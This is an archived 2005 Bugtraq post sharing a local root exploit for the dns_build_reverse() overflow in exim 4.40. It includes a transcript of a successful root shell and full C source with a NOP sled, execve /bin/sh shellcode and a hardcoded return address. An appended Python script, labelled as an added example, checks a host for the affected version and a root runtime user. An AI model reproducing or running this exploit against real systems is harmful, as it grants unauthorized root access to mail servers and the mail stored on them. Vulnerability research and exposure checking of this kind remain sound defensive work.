[38966] in bugtraq
exim 4.40 exploit
daemon@ATHENA.MIT.EDU (plugger)
Wed May 25 13:47:53 2005
From: "plugger" <plug@internode.on.net>
Reply-To: plug@internode.on.net
To: bugtraq@securityfocus.com
Date: Tue, 24 May 2005 23:12:37 +0950
Message-id: <42932f4d.2d.4445.4572@internode.on.net>
hello punters,
I was bored last night so I coded up a local exploit of the
dns_build_reverse() vulnerability in exim 4.40. Hope no one
minds, as it was disclosed 5 months ago.
Tested on exim 4.40 default build with runtime user as root
rather than exim or mail - hence the root shell. See below
for versions and system details. "exploit" attached.
regards
plug
============
the details
============
plug@bug:~$ uname -a
Linux bug 2.6.8-2-686 #1 Mon Jan 24 03:58:38 EST 2005 i686 GNU/Linux
plug@bug:~$ /usr/exim/bin/exim -bV
Exim version 4.40 #1 built 23-May-2005 22:31:34
Copyright (c) University of Cambridge 2004
Berkeley DB: Sleepycat Software: Berkeley DB 4.2.52: (December 3, 2003)
Support for: iconv()
Lookups: lsearch wildlsearch nwildlsearch iplsearch dbm dbmnz
Authenticators:
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile autoreply pipe smtp
Fixed never_users: 0
Configuration file is /usr/exim/configure
plug@bug:~$
plug@bug:~$
plug@bug:~$ ./exim-exploit
Firing up exim - cross your fingers for shell!
**** SMTP testing session as if from host
::%A:::::::::::::::::1=c0FF V
=b0 N=cd1=db=d8@=cd=e8=dc=ff=ff=ff/bin/sh=f4=f2=ff=bf
**** but without any ident (RFC 1413) callback.
=f3
**** This is not for real!
>>> host in host_lookup? yes (matched "*")
>>> looking up host name for ::%A:::::::::::::::::1=c0FF V
=b0
N=cd1=db=d8@=cd=e8=dc=ff=ff=ff/bin/sh=f4=f2=ff=bf
>>> IP address lookup using gethostbyaddr() =f3
>>> IP address lookup failed: h_errno=1
LOG: no host name found for IP address
::%A:::::::::::::::::1=c0FF V
=b0 N=cd1=db=d8@=cd=e8=dc=ff=ff=ff/bin/sh=f4=f2=ff=bf
sh-2.05b#
=f3
sh-2.05b#
sh-2.05b#
sh-2.05b# whoami
root
sh-2.05b#
sh-2.05b# exit
exit
plug@bug:~$
Content-Disposition: attachment; filename="exim-exploit.c"

/*
 * ripped straight off iDEFENSE advisory - so lazy I just picked
 * up GDB... bored on a weeknight :(
 *
 * nothing to write home to mother about due to the fact that
 * you need a local user account on a server and all you
 * get is to read other people's emails ....
 *
 * not even my own shellcode. aleph1 shellcode - cut and paste job
 * with nops to pad.
 *
 * Regards,
 * Plugger aka Tony Lockett
 *
 */

#include <stdio.h>      /* printf() */
#include <unistd.h>     /* execve() */

char bomb[288]=

/* the gear from iDEFENSE */
"::%A:::::::::::::::::"                             /* 21 bytes  */
                                                    /* --------  */
/* NOPS for padding: 17 lines of 12, then 9, then 2 */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90"                                          /* 215 bytes */
                                                    /* --------- */
/* actual code courtesy Aleph1 */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"  /* 12 bytes  */
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"  /* 12 bytes  */
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"              /* 9 bytes   */
"\xe8\xdc\xff\xff\xff/bin/sh"                       /* 12 bytes  */

/* where EIP should point */
"\xf4\xf2\xff\xbf";                                 /*  4 bytes  */
                                                    /* --------  */
                                                    /* 49 bytes  */
                                                    /* --------  */
                                                    /* 285 bytes; bomb[288] zero-fills the rest */
                                                    /* ========= */
int main(void)
{
  /* -bh runs a test SMTP session "as if from" the address in argv[2];
     the host-name lookup shown in the transcript is where dns_build_reverse()
     sees the overlong address */
  char *exim[4];
  exim[0] = "/usr/exim/bin/exim";
  exim[1] = "-bh";
  exim[2] = bomb;
  exim[3] = 0x0;
  printf("Firing up exim - cross your fingers for shell!\n");
  execve(exim[0],exim,0x0);
  return 1;   /* only reached if execve() fails */
}
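The two conditions the post relies on, an exim 4.40 build and a runtime user of root, are what an administrator would want to verify on their own hosts. The script below is an added example, not code from the post or from the Exim project. It parses the `exim -bV` banner quoted in the transcript above (embedded here as sample input) and the output of `exim -bP exim_user`, which the post does not show and which is assumed to print a line of the form `exim_user = <name>`; the version cut-off is the one the post names, and the authoritative cut-off should be taken from the vendor advisory.

```python
"""Check an Exim host for the two conditions this post relies on:
a 4.40 build and a root runtime user.

Added example, not code from the post or from the Exim project.
Assumes `exim -bP exim_user` prints a line `exim_user = <name>`.
"""
import re
import subprocess

# The post names 4.40 as the exploited release.  Builds at or below it are
# flagged for review; take the authoritative cut-off from the vendor advisory.
AFFECTED_VERSION = (4, 40)

# Sample input: the -bV banner copied from the transcript in the post, and a
# constructed -bP line reflecting the "runtime user as root" build it describes.
SAMPLE_BV = """Exim version 4.40 #1 built 23-May-2005 22:31:34
Copyright (c) University of Cambridge 2004
Berkeley DB: Sleepycat Software: Berkeley DB 4.2.52: (December 3, 2003)
Support for: iconv()
Lookups: lsearch wildlsearch nwildlsearch iplsearch dbm dbmnz
Authenticators:
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile autoreply pipe smtp
Fixed never_users: 0
Configuration file is /usr/exim/configure
"""
SAMPLE_BP = "exim_user = root\n"   # constructed


def parse_version(bv_output):
    """Return (major, minor) from the 'Exim version X.YY' banner line."""
    m = re.search(r"^Exim version (\d+)\.(\d+)", bv_output, re.MULTILINE)
    if m is None:
        raise ValueError("no 'Exim version' banner in -bV output")
    return int(m.group(1)), int(m.group(2))


def parse_exim_user(bp_output):
    """Return the configured runtime user name, or '' if the line is absent."""
    m = re.search(r"^exim_user\s*=\s*(\S*)", bp_output, re.MULTILINE)
    return m.group(1) if m else ""


def assess(bv_output, bp_output):
    """Return a list of findings; an empty list means neither condition holds."""
    findings = []
    version = parse_version(bv_output)
    if version <= AFFECTED_VERSION:
        findings.append(
            "exim %d.%02d is not newer than 4.40, the release this post exploits; "
            "check the vendor advisory and upgrade" % version)
    user = parse_exim_user(bp_output)
    if user in ("", "root", "0"):
        findings.append(
            "runtime user is root (exim_user=%r); a successful overflow in this "
            "build gives a root shell, as in the post's transcript" % user)
    return findings


def run_live(exim_path="/usr/exim/bin/exim"):
    """Collect both outputs from a real binary (path as in the post) and assess them."""
    bv = subprocess.run([exim_path, "-bV"], capture_output=True,
                        text=True, check=True).stdout
    bp = subprocess.run([exim_path, "-bP", "exim_user"], capture_output=True,
                        text=True, check=True).stdout
    return assess(bv, bp)


if __name__ == "__main__":
    for finding in assess(SAMPLE_BV, SAMPLE_BP):
        print("FINDING:", finding)
```

Run against the sample input it reports both conditions; on a host, call `run_live()` with the path of the installed binary. The runtime user check is the one that decides the impact described in the post: with a non-root `exim_user`, the same overflow would not land as root.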